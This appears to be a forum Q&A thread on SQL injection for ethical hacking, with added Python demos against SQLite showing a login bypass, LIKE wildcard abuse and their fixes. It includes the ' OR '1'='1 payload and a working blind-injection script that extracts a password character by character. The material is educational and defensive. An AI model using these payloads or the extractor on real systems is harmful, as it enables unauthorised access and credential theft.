views:

246

answers:

6

Hi all,

I want to know if you have ever performed injection on a website using SQL injection for ethical hacking.

What tricks/techniques have you used (especially with MySQL)?

+2  A: 

Nice information about techniques for SQL injection:

Example:

 statement = "SELECT * FROM users WHERE name = '" + userName + "';"
 passing userName = ' or '1'='1 gives
 SELECT * FROM users WHERE name = '' OR '1'='1';

Types of it:

1.2 Incorrect type handling
1.3 Vulnerabilities inside the database server
1.4 Blind SQL injection
 1.4.1 Conditional responses
 1.4.2 Conditional errors
 1.4.3 Time delays
Pranay Rana
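The "conditional responses" item in the list above is the one most worth seeing end to end. The following is an added example, not code from the answer: a hypothetical lookup endpoint that concatenates user input into its query and reveals only whether a row matched, and an extractor that turns that single yes/no bit into the full contents of another column, one character at a time. It uses an in-memory SQLite database with constructed rows rather than MySQL; on MySQL the same idea would use ASCII(SUBSTRING(...)) in place of SQLite's unicode(substr(...)).

```python
import sqlite3


def seed_db():
    """Constructed sample data for the demo (not from the original post)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (name, password) VALUES (?, ?)",
        [("admin", "s3cret!"), ("alice", "wonderland")],
    )
    conn.commit()
    return conn


def vulnerable_user_exists(conn, name):
    """Hypothetical vulnerable endpoint: input is glued into the SQL text and
    the caller learns only whether any row matched (a conditional response)."""
    query = "SELECT id FROM users WHERE name = '" + name + "'"
    return conn.execute(query).fetchone() is not None


def safe_user_exists(conn, name):
    """Same endpoint with a bound parameter: input is compared as data only."""
    query = "SELECT id FROM users WHERE name = ?"
    return conn.execute(query, (name,)).fetchone() is not None


def oracle(conn, target_user, condition):
    """Ask the vulnerable endpoint a yes/no question about target_user's row
    by appending an injected condition to the WHERE clause."""
    payload = f"{target_user}' AND ({condition}) AND '1'='1"
    return vulnerable_user_exists(conn, payload)


def extract_password(conn, target_user, max_len=32):
    """Boolean-based blind extraction: recover the password column character by
    character, binary-searching each character's code point (7 queries per
    character instead of one per candidate)."""
    recovered = ""
    for pos in range(1, max_len + 1):
        # Stop when the string has no character at this position.
        if not oracle(conn, target_user, f"length(password) >= {pos}"):
            break
        lo, hi = 32, 126  # printable ASCII assumed for the demo
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, target_user, f"unicode(substr(password,{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    db = seed_db()
    print(extract_password(db, "admin"))   # recovered through yes/no answers only
    print(safe_user_exists(db, "admin' AND (1=1) AND '1'='1"))  # parameterised: False
```

The endpoint never returns the password; the attacker only ever sees "found" or "not found", which is why this class is called blind. The parameterised variant answers False for the same payload because the whole string, quotes included, is compared against the name column.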
+5  A: 

I've used the standard trick on login forms:

user: admin
pass: ' OR '1'='1
Emil Vikström
Could you elaborate on what kind of counter measures can be taken?
diamandiev
@diamandiev no need to use any special counter measures at all. A well-built application is already invulnerable to this silly "attack"
Col. Shrapnel
To answer myself. Use parameters and/or stored procedures: UserPassword = @Password
diamandiev
and did that ever work?
Thilo
Thilo, yes. Not in my own code, but when checking others'. I've worked for a web hosting provider and when someone hacks a website the customer always blames us first, even though the above SQL injection often works. Trying standard SQL injection attacks before checking their code often saves a lot of time :-)
Emil Vikström
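To make the login trick in this answer and the countermeasure from the comments concrete, here is an added example (not code from the answer or the comments): a login check that concatenates the form fields into the SQL, beside the same check with bound parameters. It runs against an in-memory SQLite table with a constructed user rather than MySQL; the behaviour of the two queries is the same on MySQL.

```python
import sqlite3


def build_db():
    """Constructed demo table with one account (not from the original answer)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct horse')")
    conn.commit()
    return conn


def login_vulnerable(conn, user, password):
    """The login form from the answer: both fields are spliced into the SQL text.
    With password = ' OR '1'='1 the WHERE clause becomes
        name = 'admin' AND password = '' OR '1'='1'
    and AND binds tighter than OR, so the OR '1'='1' part makes it true for every row."""
    sql = ("SELECT name FROM users WHERE name = '" + user
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_parameterised(conn, user, password):
    """The countermeasure from the comments: values are bound as parameters, so the
    database only ever sees them as string data, never as part of the query."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (user, password)).fetchone() is not None


def demo():
    """Run the standard trick against both versions and report what each does."""
    conn = build_db()
    trick = "' OR '1'='1"
    return {
        "vulnerable_with_trick": login_vulnerable(conn, "admin", trick),
        "parameterised_with_trick": login_parameterised(conn, "admin", trick),
        "parameterised_real_password": login_parameterised(conn, "admin", "correct horse"),
        "parameterised_wrong_password": login_parameterised(conn, "admin", "guess"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The vulnerable version lets the trick through even though "admin" has a completely different password, and it would also let it through for a user name that does not exist, because the injected OR is evaluated against every row. The parameterised version rejects it and only accepts the real credentials. (The example stores a plaintext password purely to keep the query visible; a real login check would compare a password hash.)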
+5  A: 

If you intend to perform ethical hacking or penetration testing of applications using MySQL, you'll find the OWASP Testing Guide, specifically the section on MySQL to be of immense value, apart from the generic Testing Guide for SQL injection.

Note that this does not make any assumptions about the framework or language in use - PHP, Java (including Java EE, Spring etc.), so it is pretty generic in how SQL injection may be attempted against an application. The actual techniques involved in getting the user inputs to the database access layer of the application will, indeed, vary from one application to another. Applications that parse HTTP requests will, of course, require all inputs (URL parameters, name-value pairs in the POST body, HTTP headers) to be suspect. Having a different source of input (say XML or JSON instead of simple HTTP requests) will require you to feed in SQL in an appropriate manner that will be understood by the application's parsers, eventually resulting in transportation of SQL to the layer where database queries are executed.

Vineet Reynolds
+6  A: 

Not directly, but sometimes I do LIKE searches with wildcards (%) even though the search page does not say it supports them.

Thilo
I think Neopets once acknowledged that this trick worked with some of their search boxes. Or at least they didn't mind fan sites showing that it works.
BoltClock
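The wildcard trick in this answer is not SQL injection in the strict sense: it works even against a fully parameterised query, because % and _ are interpreted by LIKE itself, not by the SQL parser. The following is an added example (not code from the answer) showing a parameterised search that still honours user-supplied wildcards, beside one that escapes them so the search term is matched literally. It uses an in-memory SQLite table with constructed rows; MySQL's LIKE treats % and _ the same way and uses backslash as its default escape character.

```python
import sqlite3


def build_catalog():
    """Constructed sample rows for the demo (not from the original answer)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (name TEXT)")
    conn.executemany(
        "INSERT INTO items VALUES (?)",
        [("red apple",), ("green_apple",), ("pear",)],
    )
    conn.commit()
    return conn


def search_naive(conn, term):
    """Parameterised, so no SQL injection is possible, but the term is wrapped in
    %...% and any % or _ inside it still acts as a LIKE wildcard."""
    rows = conn.execute(
        "SELECT name FROM items WHERE name LIKE ? ORDER BY name",
        ("%" + term + "%",),
    )
    return [r[0] for r in rows]


def escape_like(term, esc="\\"):
    """Escape the LIKE metacharacters (and the escape character itself) so that
    the term is matched literally. The escape character must be doubled first."""
    return (term.replace(esc, esc + esc)
                .replace("%", esc + "%")
                .replace("_", esc + "_"))


def search_literal(conn, term):
    """Same query with the user's term escaped and an ESCAPE clause, so only the
    surrounding %...% added by the application act as wildcards."""
    rows = conn.execute(
        "SELECT name FROM items WHERE name LIKE ? ESCAPE '\\' ORDER BY name",
        ("%" + escape_like(term) + "%",),
    )
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = build_catalog()
    print(search_naive(db, "%"))      # every row: the page "does not support" wildcards, LIKE does
    print(search_naive(db, "d_a"))    # _ matches the space in "red apple"
    print(search_literal(db, "%"))    # nothing: no name contains a literal %
    print(search_literal(db, "_"))    # only "green_apple"
```

A bare % as the search term dumps the whole table, which is the behaviour the answer describes; this is usually only an information-disclosure or performance issue, but on large tables a pattern like %a%b%c% can also be a cheap way to tie up the database. Escaping the term (or rejecting wildcard characters outright when the feature is not meant to exist) is the fix, and it is separate from parameterisation, which on its own does nothing about it.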
A: 

You just reminded me of this, I hope you'll find it fun: http://xkcd.com/327/ ;)

Dane411
Little Bobby Tables moved to Norway - https://www.sysedata.no/nyheter/edvin-tables#english
Vineet Reynolds
"and figured we'd use the opportunity for some harmless - or so we thought - fun." At least the companies who had to work with this company on their databases had to make great SQL anti-injection protection! :)
Dane411
A: 

Yes I have used the basic methods like everyone else, but always on my own websites

' OR '1'='1

I even joined a site where you can learn the basics of hacking a website; they have put up a series of websites specially made to show the vulnerabilities of the website (of course you are not shown how to do it, but you have to find it out for yourself). And no, I feel no guilt whatsoever, as I do not use it to harm other people's websites but only mine.

krike